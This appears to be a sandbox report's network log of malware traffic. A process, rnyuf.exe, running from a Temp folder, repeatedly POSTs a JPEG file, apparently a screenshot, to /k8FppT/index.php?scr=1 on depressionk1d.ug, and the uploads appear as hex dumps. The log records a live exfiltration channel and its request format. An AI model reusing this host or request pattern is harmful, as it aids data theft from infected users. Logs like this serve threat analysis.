                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----0b6edbf9bdab22be0590ffda9d2d8f20
                                                                                                                                                                                Host: depressionk1d.ug
                                                                                                                                                                                Content-Length: 85145
                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                Nov 11, 2021 12:26:49.121313095 CET14760OUTData Raw: 2d 2d 2d 2d 2d 2d 30 62 36 65 64 62 66 39 62 64 61 62 32 32 62 65 30 35 39 30 66 66 64 61 39 64 32 64 38 66 32 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                                                                                                                                Data Ascii: ------0b6edbf9bdab22be0590ffda9d2d8f20Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                                                                                                                                                                Nov 11, 2021 12:26:49.121517897 CET14770OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                                                                                                                                Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                                                                                                                                Nov 11, 2021 12:26:49.121670008 CET14773OUTData Raw: 18 22 87 65 ab 04 9b d8 c9 af 58 f8 4d e3 dd 0b c2 1a 3e a1 6f ab 4d 32 49 3d c0 74 58 a2 2f c0 5c 73 5e 71 67 a0 6b 5a 8b ba 59 68 fa 85 cb 22 23 ba c1 6a ee 55 5c 65 09 c0 e0 11 c8 3d c5 55 16 77 58 88 fd 96 7c 4d 21 8a 23 e5 9f 9d c6 32 a3 8e
                                                                                                                                                                                Data Ascii: "eXM>oM2I=tX/\s^qgkZYh"#jU\e=UwX|M!#2Hz(r]vx3~/?|=|uwqIer2`B=0iSL%\.Ccs+/cY>{k%OG$vx#A!R<W)k%%}
                                                                                                                                                                                Nov 11, 2021 12:26:49.146457911 CET14775OUTData Raw: b7 68 72 6a d7 d2 b4 7a 35 fe a5 1d 8e 9e 91 46 2f 2d 62 83 6a c5 89 96 36 9d 1e 2c 86 da 31 80 d8 ce 08 c1 07 8f f1 1d dd 9f f6 36 93 67 63 6d a7 42 48 b8 92 e5 60 f2 e5 95 18 4f 28 45 69 54 64 80 9b 71 ce 18 60 f3 c6 39 df 29 7f ba 29 42 01 d0
                                                                                                                                                                                Data Ascii: hrjz5F/-bj6,16gcmBH`O(EiTdq`9))BP+Zs<Z#cw)e%I-ii,aX')-(YDlC8$ngwEs{9Qu{m-nQREn`QE%Q@(9`G4sH( 0IE-
                                                                                                                                                                                Nov 11, 2021 12:26:49.146522999 CET14778OUTData Raw: 91 68 ef 49 45 30 17 34 a0 d3 69 68 4c 43 c3 53 d5 b9 a8 45 38 55 5c 96 89 b2 0d 05 41 a8 81 a5 04 d5 5c 56 1c 61 53 4c 36 fe 95 20 6a 70 6a 2c 98 af 24 56 30 b0 a6 94 23 b5 5d e0 d2 ec 53 4b 91 0f da 3e a6 79 14 a2 ae 98 54 d3 0d b7 71 4b d9 b2
                                                                                                                                                                                Data Ascii: hIE04ihLCSE8U\A\VaSL6 jpj,$V0#]SK>yTqK+b0M(.V)qF)bRKvR([P)qKiWb1L.7b1EqQ,#"TX.E.(.Q+S iZB#X9>Gmjqh;1I8ke'q(
                                                                                                                                                                                Nov 11, 2021 12:26:49.146681070 CET14781OUTData Raw: 5f 95 a7 f7 3b 9f 60 db 78 a7 42 b9 b7 49 97 56 b3 40 c3 3b 65 99 51 87 d4 13 9a c2 97 4e f0 7c 9a 7d fd aa 6b 16 50 c9 7d 72 6e a5 ba 8e e2 11 36 ff 00 37 cd 03 71 1c 80 c0 60 10 78 af 99 3f b4 2f 7f e7 f2 e3 fe fe b7 f8 d1 fd a1 7b ff 00 3f 97
                                                                                                                                                                                Data Ascii: _;`xBIV@;eQN|}kP}rn67q`x?/{?pZuo}AxONPMn[+5ldgebc1[(SY>NVc9/h^?Gw_,F=T}m8(Pp;+v*^u3ow(f_B
                                                                                                                                                                                Nov 11, 2021 12:26:49.146698952 CET14784OUTData Raw: 9e 59 4c ed ea ae 73 f3 0a e6 5a f2 ed ad ae ed bc d5 58 2e e5 59 a7 8d 63 55 0c eb bb 69 18 1f 28 1b db 81 81 cf d2 a6 7d 5b 52 92 7b a9 5a e5 4b 5d 5b 0b 59 57 ca 4d 86 21 b7 6a 85 c6 06 36 ae 30 01 04 64 73 4f d9 d4 e9 e5 ff 00 07 ef 77 f9 0b
                                                                                                                                                                                Data Ascii: YLsZX.YcUi(}[R{ZK][YWM!j60dsOwCvW^xum>#{Nnte!O-^2L1L&}FXA%#4nR#$1RN?-u/)Lrm_G60~ZKIX(,D^>GtrUiWz}:]e.
                                                                                                                                                                                Nov 11, 2021 12:26:49.146734953 CET14786OUTData Raw: 3b ce cf 6a 39 22 c3 9e 45 2d 8c 3b 1a 6e d3 e9 57 fc c5 3d 45 2f ee cf f0 d1 ec fc c3 da 3e c6 7f 39 a5 19 c5 68 79 51 1a 0d b4 47 bd 2f 64 c3 da a3 3e 96 ae 7d 8c 76 6a 4f b1 b7 63 47 b2 90 fd a4 4a 94 55 83 69 20 ed 4d 36 f2 0e c6 97 23 1a 9c
                                                                                                                                                                                Data Ascii: ;j9"E-;nW=E/>9hyQG/d>}vjOcGJUi M6#{T6iHJ1N(PS6(\1ERS!(PK@H)iF9-1F)iiJ4THZb)qKKLTM1NVa\n(?b1K~p^iXv(
                                                                                                                                                                                Nov 11, 2021 12:26:49.146759987 CET14789OUTData Raw: 16 32 74 14 e8 37 68 cf 47 ea b6 22 26 ba 7f 06 4b 21 96 fe 02 4f 92 60 de 47 60 c0 8c 7f 33 54 0e 8f a7 cb fb db 7f 10 69 fe 47 5f df 39 47 03 fd da e8 34 3f b0 c3 63 24 7a 73 bc d1 b3 62 5b 96 5d be 69 1d 94 7f 74 7f 3a f6 33 bc d3 0b 1c 0c d5
                                                                                                                                                                                Data Ascii: 2t7hG"&K!O`G`3TiG_9G4?c$zsb[]it:3uk]FR4k-c+s{|]5\D1r^)b~gJ]JZ+_hJ--e1]j6w]f7W:Dq0w\+
                                                                                                                                                                                Nov 11, 2021 12:26:49.146780014 CET14792OUTData Raw: 46 46 2b 23 64 02 31 c5 79 56 69 45 57 d5 a9 76 17 d6 2a 77 16 8a 28 ef 5b a3 01 69 29 69 28 62 12 90 d2 d1 40 c2 96 90 52 d0 80 29 69 29 68 10 a0 d2 d2 52 d3 13 0a 5a 4a 5a a1 0a 29 d4 d1 4b 40 98 b4 b4 94 a2 98 82 96 92 8a 60 3a 8a 4a 29 88 5a
                                                                                                                                                                                Data Ascii: FF+#d1yViEWv*w([i)i(b@R)i)hRZJZ)K@`:J)Z(ESi)A>)jHiN%ZbxcQUd!Ki8)VqE9j4lh-*OWUArU$MVpsOZ):e*SzpsO}PO
                                                                                                                                                                                Nov 11, 2021 12:26:49.202481031 CET14848INHTTP/1.1 200 OK
                                                                                                                                                                                Server: nginx
                                                                                                                                                                                Date: Thu, 11 Nov 2021 11:26:49 GMT
                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                Keep-Alive: timeout=5
                                                                                                                                                                                X-Powered-By: PHP/5.6.37


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                23192.168.2.549798178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Nov 11, 2021 12:26:50.236922979 CET18505OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----505de9bbc17ec1c974d13a3618cbae6d
                                                                                                                                                                                Host: depressionk1d.ug
                                                                                                                                                                                Content-Length: 72800
                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                Nov 11, 2021 12:26:50.237005949 CET18505OUTData Raw: 2d 2d 2d 2d 2d 2d 35 30 35 64 65 39 62 62 63 31 37 65 63 31 63 39 37 34 64 31 33 61 33 36 31 38 63 62 61 65 36 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                                                                                                                                Data Ascii: ------505de9bbc17ec1c974d13a3618cbae6dContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                                                                                                                                                                Nov 11, 2021 12:26:50.237169027 CET18515OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                                                                                                                                Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                                                                                                                                Nov 11, 2021 12:26:50.237258911 CET18517OUTData Raw: e8 8f 3e 4f 57 ea ff 00 30 a5 a5 c5 18 ad 09 b8 da 31 4e c5 25 20 1a 45 26 29 d8 a3 14 58 77 1b 8a 31 4e c5 26 29 58 2e 27 34 73 47 6a 29 58 04 a2 96 93 bd 16 18 98 a3 14 b4 50 31 00 a0 d2 d1 45 80 4a 31 4b 45 02 12 8a 5a 4a 06 14 51 47 4a 00 5a
                                                                                                                                                                                Data Ascii: >OW01N% E&)Xw1N&)X.'4sGj)XP1EJ1KEZJQGJZ(QC(E-QE>a:'Rm8Mvx;YxGZJbt0jhKh#,$u3OTk%2Ma(;G=*5uijP?rmB
                                                                                                                                                                                Nov 11, 2021 12:26:50.262140989 CET18524OUTData Raw: fe 7a cf ff 00 7d 0f f0 a8 9b c3 b6 60 7f ac 9f fe fa 1f e1 5d 2f 03 58 e5 58 fa 2c e6 75 6f f8 fe 5f fa e1 0f fe 8a 5a a3 5a 5a f4 62 2d 5e 48 d7 25 52 38 94 67 da 35 ac da f1 2b ab 55 92 f3 67 b1 41 de 94 5f 92 0a 28 a2 b2 35 0a 28 a2 80 0a 28
                                                                                                                                                                                Data Ascii: z}`]/XX,uo_ZZZb-^H%R8g5+UgA_(5((((((((((((((((((((((((((((((((((((((((((
                                                                                                                                                                                Nov 11, 2021 12:26:50.262314081 CET18534OUTData Raw: a4 53 71 53 95 a6 15 ac dc 4d 14 88 e9 31 52 11 49 8a 9b 15 71 b4 98 e6 9f 8a 69 14 58 2e 52 a5 14 52 57 31 d0 2d 35 ba 53 8d 34 83 c0 1d 68 63 43 75 6f f8 fe 5f fa e1 0f fe 8a 5a a3 57 b5 70 56 fc 02 08 22 08 41 07 b7 ee d6 a8 d7 9d 5b f8 92 f5
                                                                                                                                                                                Data Ascii: SqSM1RIqiX.RRW1-5S4hcCuo_ZWpV"A[guQYQ@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@
                                                                                                                                                                                Nov 11, 2021 12:26:50.262413979 CET18537OUTData Raw: 5b 6f fa f4 5f fd 0d eb 9a 4a fa cc 07 f0 23 e8 7c 26 6d fe f5 32 74 e9 52 0a 62 d3 c5 7a 28 f1 d8 ea 72 fd e1 4c a5 1d 6a 65 b0 96 e6 f7 8d bf e4 52 d2 7e a7 f9 57 9b 27 fa d5 fa d7 a2 78 d9 8f fc 22 ba 40 f6 26 bc e5 3f d6 af d6 b8 70 ba 51 7e
                                                                                                                                                                                Data Ascii: [o_J#|&m2tRbz(rLjeR~W'x"@&?pQ~:G\iXs3+w5It-/JAKCCfHpxK4CE8Z=M4x,)(!E.8\qHR-0SK-zTBf$N@)=Wk>*
                                                                                                                                                                                Nov 11, 2021 12:26:50.262473106 CET18541OUTData Raw: ff 00 40 cf fc 95 3f e3 59 fb 35 e7 f7 7f c1 2f da 3f 2f bf fe 01 e3 b4 57 b0 ff 00 6b 7c 2e ff 00 a0 67 fe 4a 9f f1 a8 ee 35 6f 86 8d 6d 2a db e9 a1 66 28 44 6c d6 a7 01 b1 c1 3c fa d1 ec d7 9f dd ff 00 04 3d a3 f2 fb ff 00 e0 1e 45 45 6b 7d b6
                                                                                                                                                                                Data Ascii: @?Y5/?/Wk|.gJ5om*f(Dl<=EEk}_i4lx$_MieGoEk}Oi4w'HV]"1X>'H>CSi4}U
                                                                                                                                                                                Nov 11, 2021 12:26:50.262559891 CET18544OUTData Raw: a7 62 8e 51 39 11 ed a0 ae 6a 5c 50 07 34 f9 45 cc 31 56 9e a9 4e c5 48 06 05 5a 89 0e 44 2c 94 cd b5 64 af 15 19 5a 1c 41 48 88 2e 6a 40 94 a0 54 81 68 48 1c 86 04 a9 55 29 42 d3 c0 c5 68 a2 66 e4 33 65 1b 2a 4c 52 81 57 ca 4f 31 1e da 70 5a 7e
                                                                                                                                                                                Data Ascii: bQ9j\P4E1VNHZD,dZAH.j@ThHU)Bhf3e*LRWO1pZ~8hQ0)vqKR9S)64FF|F'%.RF(1FbQsleMj\S1JQ.b *@)ie*\R9EB(rglqK|lR(
                                                                                                                                                                                Nov 11, 2021 12:26:50.288028002 CET18547OUTData Raw: 98 ac 38 1e 69 c2 98 29 f5 48 4c 29 3b 52 d2 50 21 a3 a8 a9 01 a8 bb d4 83 a5 08 6c 7d 14 51 54 40 a3 ad 3e 98 29 6a 90 99 20 a7 53 14 f1 4e 3d 2a 91 0c 3b d3 bb 53 05 2d 00 2d 27 43 45 14 08 90 1c 8a 29 82 9f 54 26 28 a7 53 69 d5 44 05 14 52 74
                                                                                                                                                                                Data Ascii: 8i)HL);RP!l}QT@>)j SN=*;S--'CE)T&(SiDRt48pMppD1SE(%8S)h( P(BQIK@SitQ@Lp$)GZ)(LLnxt5#Yk[C-v}#ke.ER(R(BR1ii(BIKHS)$u)
                                                                                                                                                                                Nov 11, 2021 12:26:50.288050890 CET18553OUTData Raw: 9f 07 c7 ba 0d 4c ff 00 d3 2f e8 6b 98 61 f3 1f ad 70 50 97 ef ea 2f 43 aa ba b5 08 3f 51 b4 62 97 14 62 bb 6e 70 dc 4a 70 a3 14 01 40 82 96 97 14 b8 f6 a9 6c 42 62 8c 53 c2 13 da 9e 96 f2 39 e1 18 fd 05 4b 9a 43 e5 6f 62 3f c2 8f c2 ad a6 9b 74
                                                                                                                                                                                Data Ascii: L/kapP/C?QbbnpJp@lBbS9KCob?tvV!P@^%Y3Noh{xjk`>9=(tuj/wbk/$g8z#*1+t4'i.TSZ=i|0hgG]~X[=;A&
                                                                                                                                                                                Nov 11, 2021 12:26:50.317014933 CET18582INHTTP/1.1 200 OK
                                                                                                                                                                                Server: nginx
                                                                                                                                                                                Date: Thu, 11 Nov 2021 11:26:50 GMT
                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                Keep-Alive: timeout=5
                                                                                                                                                                                X-Powered-By: PHP/5.6.37


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                24192.168.2.549802178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Nov 11, 2021 12:26:51.626091003 CET20441OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----0b6edbf9bdab22be0590ffda9d2d8f20
                                                                                                                                                                                Host: depressionk1d.ug
                                                                                                                                                                                Content-Length: 85145
                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                Nov 11, 2021 12:26:51.626249075 CET20441OUTData Raw: 2d 2d 2d 2d 2d 2d 30 62 36 65 64 62 66 39 62 64 61 62 32 32 62 65 30 35 39 30 66 66 64 61 39 64 32 64 38 66 32 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                                                                                                                                Data Ascii: ------0b6edbf9bdab22be0590ffda9d2d8f20Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                                                                                                                                                                Nov 11, 2021 12:26:51.626338959 CET20451OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                                                                                                                                Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                                                                                                                                Nov 11, 2021 12:26:51.626473904 CET20454OUTData Raw: 18 22 87 65 ab 04 9b d8 c9 af 58 f8 4d e3 dd 0b c2 1a 3e a1 6f ab 4d 32 49 3d c0 74 58 a2 2f c0 5c 73 5e 71 67 a0 6b 5a 8b ba 59 68 fa 85 cb 22 23 ba c1 6a ee 55 5c 65 09 c0 e0 11 c8 3d c5 55 16 77 58 88 fd 96 7c 4d 21 8a 23 e5 9f 9d c6 32 a3 8e
                                                                                                                                                                                Data Ascii: "eXM>oM2I=tX/\s^qgkZYh"#jU\e=UwX|M!#2Hz(r]vx3~/?|=|uwqIer2`B=0iSL%\.Ccs+/cY>{k%OG$vx#A!R<W)k%%}
                                                                                                                                                                                Nov 11, 2021 12:26:51.651693106 CET20457OUTData Raw: b7 68 72 6a d7 d2 b4 7a 35 fe a5 1d 8e 9e 91 46 2f 2d 62 83 6a c5 89 96 36 9d 1e 2c 86 da 31 80 d8 ce 08 c1 07 8f f1 1d dd 9f f6 36 93 67 63 6d a7 42 48 b8 92 e5 60 f2 e5 95 18 4f 28 45 69 54 64 80 9b 71 ce 18 60 f3 c6 39 df 29 7f ba 29 42 01 d0
                                                                                                                                                                                Data Ascii: hrjz5F/-bj6,16gcmBH`O(EiTdq`9))BP+Zs<Z#cw)e%I-ii,aX')-(YDlC8$ngwEs{9Qu{m-nQREn`QE%Q@(9`G4sH( 0IE-
                                                                                                                                                                                Nov 11, 2021 12:26:51.651727915 CET20460OUTData Raw: 91 68 ef 49 45 30 17 34 a0 d3 69 68 4c 43 c3 53 d5 b9 a8 45 38 55 5c 96 89 b2 0d 05 41 a8 81 a5 04 d5 5c 56 1c 61 53 4c 36 fe 95 20 6a 70 6a 2c 98 af 24 56 30 b0 a6 94 23 b5 5d e0 d2 ec 53 4b 91 0f da 3e a6 79 14 a2 ae 98 54 d3 0d b7 71 4b d9 b2
                                                                                                                                                                                Data Ascii: hIE04ihLCSE8U\A\VaSL6 jpj,$V0#]SK>yTqK+b0M(.V)qF)bRKvR([P)qKiWb1L.7b1EqQ,#"TX.E.(.Q+S iZB#X9>Gmjqh;1I8ke'q(
                                                                                                                                                                                Nov 11, 2021 12:26:51.651736975 CET20463OUTData Raw: 5f 95 a7 f7 3b 9f 60 db 78 a7 42 b9 b7 49 97 56 b3 40 c3 3b 65 99 51 87 d4 13 9a c2 97 4e f0 7c 9a 7d fd aa 6b 16 50 c9 7d 72 6e a5 ba 8e e2 11 36 ff 00 37 cd 03 71 1c 80 c0 60 10 78 af 99 3f b4 2f 7f e7 f2 e3 fe fe b7 f8 d1 fd a1 7b ff 00 3f 97
                                                                                                                                                                                Data Ascii: _;`xBIV@;eQN|}kP}rn67q`x?/{?pZuo}AxONPMn[+5ldgebc1[(SY>NVc9/h^?Gw_,F=T}m8(Pp;+v*^u3ow(f_B
                                                                                                                                                                                Nov 11, 2021 12:26:51.651886940 CET20468OUTData Raw: 9e 59 4c ed ea ae 73 f3 0a e6 5a f2 ed ad ae ed bc d5 58 2e e5 59 a7 8d 63 55 0c eb bb 69 18 1f 28 1b db 81 81 cf d2 a6 7d 5b 52 92 7b a9 5a e5 4b 5d 5b 0b 59 57 ca 4d 86 21 b7 6a 85 c6 06 36 ae 30 01 04 64 73 4f d9 d4 e9 e5 ff 00 07 ef 77 f9 0b
                                                                                                                                                                                Data Ascii: YLsZX.YcUi(}[R{ZK][YWM!j60dsOwCvW^xum>#{Nnte!O-^2L1L&}FXA%#4nR#$1RN?-u/)Lrm_G60~ZKIX(,D^>GtrUiWz}:]e.
                                                                                                                                                                                Nov 11, 2021 12:26:51.651993036 CET20474OUTData Raw: 16 32 74 14 e8 37 68 cf 47 ea b6 22 26 ba 7f 06 4b 21 96 fe 02 4f 92 60 de 47 60 c0 8c 7f 33 54 0e 8f a7 cb fb db 7f 10 69 fe 47 5f df 39 47 03 fd da e8 34 3f b0 c3 63 24 7a 73 bc d1 b3 62 5b 96 5d be 69 1d 94 7f 74 7f 3a f6 33 bc d3 0b 1c 0c d5
                                                                                                                                                                                Data Ascii: 2t7hG"&K!O`G`3TiG_9G4?c$zsb[]it:3uk]FR4k-c+s{|]5\D1r^)b~gJ]JZ+_hJ--e1]j6w]f7W:Dq0w\+
                                                                                                                                                                                Nov 11, 2021 12:26:51.652014971 CET20478OUTData Raw: 9f f0 45 be f0 e6 ad a6 d8 bd e5 dd b2 c7 0c 6e 91 c8 44 f1 b3 46 ec 09 0a ea 18 b2 b6 01 e0 80 47 7a ca 15 d1 6a 3a ce 9d a9 78 73 5e 96 2b 3f b0 ea 17 ba 85 ad c4 c8 f7 7e 67 9a d8 97 79 8d 76 82 a8 09 ce 3e 62 37 75 e9 5c ed 6d 46 a4 e7 75 35
                                                                                                                                                                                Data Ascii: EnDFGzj:xs^+?~gyv>b7u\mFu5k2pl@)(AGz)hRR(*QGz`-- )i)Z(N!E-7(!F)D>SE(5DSsFix4iDipDRR8SuR%PxZd4H<
                                                                                                                                                                                Nov 11, 2021 12:26:51.652216911 CET20480OUTData Raw: 35 96 54 92 53 7e 67 a5 99 dd d4 82 7d 8f 4f 8b 8f 87 76 7f 85 72 d2 e4 93 5d 52 a9 3f 0f ac 47 ae 2b 99 96 22 7d 73 46 0d ab cf d5 9c d9 ac 1b e5 b7 64 54 a2 9e 51 85 37 04 76 af 45 34 cf 05 c5 ad c4 a2 8a 29 88 5a 29 29 40 a0 07 a8 1d a9 e3 ef
                                                                                                                                                                                Data Ascii: 5TS~g}Ovr]R?G+"}sFdTQ7vE4)Z))@QIUp}6mOzRs<T3(1RhfJQc#ho SSGZp5r%Y9nSI{8=/frhwDj=jQ+kQygSaTe{
                                                                                                                                                                                Nov 11, 2021 12:26:51.711338997 CET20530INHTTP/1.1 200 OK
                                                                                                                                                                                Server: nginx
                                                                                                                                                                                Date: Thu, 11 Nov 2021 11:26:51 GMT
                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                Keep-Alive: timeout=5
                                                                                                                                                                                X-Powered-By: PHP/5.6.37


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                25192.168.2.549804178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Nov 11, 2021 12:26:53.594750881 CET20728OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----0b6edbf9bdab22be0590ffda9d2d8f20
                                                                                                                                                                                Host: depressionk1d.ug
                                                                                                                                                                                Content-Length: 85145
                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                Nov 11, 2021 12:26:53.594821930 CET20728OUTData Raw: 2d 2d 2d 2d 2d 2d 30 62 36 65 64 62 66 39 62 64 61 62 32 32 62 65 30 35 39 30 66 66 64 61 39 64 32 64 38 66 32 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                                                                                                                                Data Ascii: ------0b6edbf9bdab22be0590ffda9d2d8f20Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                                                                                                                                                                Nov 11, 2021 12:26:53.595016003 CET20738OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                                                                                                                                Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                                                                                                                                Nov 11, 2021 12:26:53.595074892 CET20741OUTData Raw: 18 22 87 65 ab 04 9b d8 c9 af 58 f8 4d e3 dd 0b c2 1a 3e a1 6f ab 4d 32 49 3d c0 74 58 a2 2f c0 5c 73 5e 71 67 a0 6b 5a 8b ba 59 68 fa 85 cb 22 23 ba c1 6a ee 55 5c 65 09 c0 e0 11 c8 3d c5 55 16 77 58 88 fd 96 7c 4d 21 8a 23 e5 9f 9d c6 32 a3 8e
                                                                                                                                                                                Data Ascii: "eXM>oM2I=tX/\s^qgkZYh"#jU\e=UwX|M!#2Hz(r]vx3~/?|=|uwqIer2`B=0iSL%\.Ccs+/cY>{k%OG$vx#A!R<W)k%%}
                                                                                                                                                                                Nov 11, 2021 12:26:53.620124102 CET20747OUTData Raw: b7 68 72 6a d7 d2 b4 7a 35 fe a5 1d 8e 9e 91 46 2f 2d 62 83 6a c5 89 96 36 9d 1e 2c 86 da 31 80 d8 ce 08 c1 07 8f f1 1d dd 9f f6 36 93 67 63 6d a7 42 48 b8 92 e5 60 f2 e5 95 18 4f 28 45 69 54 64 80 9b 71 ce 18 60 f3 c6 39 df 29 7f ba 29 42 01 d0
                                                                                                                                                                                Data Ascii: hrjz5F/-bj6,16gcmBH`O(EiTdq`9))BP+Zs<Z#cw)e%I-ii,aX')-(YDlC8$ngwEs{9Qu{m-nQREn`QE%Q@(9`G4sH( 0IE-
                                                                                                                                                                                Nov 11, 2021 12:26:53.620172024 CET20749OUTData Raw: 5f 95 a7 f7 3b 9f 60 db 78 a7 42 b9 b7 49 97 56 b3 40 c3 3b 65 99 51 87 d4 13 9a c2 97 4e f0 7c 9a 7d fd aa 6b 16 50 c9 7d 72 6e a5 ba 8e e2 11 36 ff 00 37 cd 03 71 1c 80 c0 60 10 78 af 99 3f b4 2f 7f e7 f2 e3 fe fe b7 f8 d1 fd a1 7b ff 00 3f 97
                                                                                                                                                                                Data Ascii: _;`xBIV@;eQN|}kP}rn67q`x?/{?pZuo}AxONPMn[+5ldgebc1[(SY>NVc9/h^?Gw_,F=T}m8(Pp;+v*^u3ow(f_B
                                                                                                                                                                                Nov 11, 2021 12:26:53.620188951 CET20752OUTData Raw: 9e 59 4c ed ea ae 73 f3 0a e6 5a f2 ed ad ae ed bc d5 58 2e e5 59 a7 8d 63 55 0c eb bb 69 18 1f 28 1b db 81 81 cf d2 a6 7d 5b 52 92 7b a9 5a e5 4b 5d 5b 0b 59 57 ca 4d 86 21 b7 6a 85 c6 06 36 ae 30 01 04 64 73 4f d9 d4 e9 e5 ff 00 07 ef 77 f9 0b
                                                                                                                                                                                Data Ascii: YLsZX.YcUi(}[R{ZK][YWM!j60dsOwCvW^xum>#{Nnte!O-^2L1L&}FXA%#4nR#$1RN?-u/)Lrm_G60~ZKIX(,D^>GtrUiWz}:]e.
                                                                                                                                                                                Nov 11, 2021 12:26:53.620208979 CET20755OUTData Raw: 3b ce cf 6a 39 22 c3 9e 45 2d 8c 3b 1a 6e d3 e9 57 fc c5 3d 45 2f ee cf f0 d1 ec fc c3 da 3e c6 7f 39 a5 19 c5 68 79 51 1a 0d b4 47 bd 2f 64 c3 da a3 3e 96 ae 7d 8c 76 6a 4f b1 b7 63 47 b2 90 fd a4 4a 94 55 83 69 20 ed 4d 36 f2 0e c6 97 23 1a 9c
                                                                                                                                                                                Data Ascii: ;j9"E-;nW=E/>9hyQG/d>}vjOcGJUi M6#{T6iHJ1N(PS6(\1ERS!(PK@H)iF9-1F)iiJ4THZb)qKKLTM1NVa\n(?b1K~p^iXv(
                                                                                                                                                                                Nov 11, 2021 12:26:53.620306969 CET20757OUTData Raw: 16 32 74 14 e8 37 68 cf 47 ea b6 22 26 ba 7f 06 4b 21 96 fe 02 4f 92 60 de 47 60 c0 8c 7f 33 54 0e 8f a7 cb fb db 7f 10 69 fe 47 5f df 39 47 03 fd da e8 34 3f b0 c3 63 24 7a 73 bc d1 b3 62 5b 96 5d be 69 1d 94 7f 74 7f 3a f6 33 bc d3 0b 1c 0c d5
                                                                                                                                                                                Data Ascii: 2t7hG"&K!O`G`3TiG_9G4?c$zsb[]it:3uk]FR4k-c+s{|]5\D1r^)b~gJ]JZ+_hJ--e1]j6w]f7W:Dq0w\+
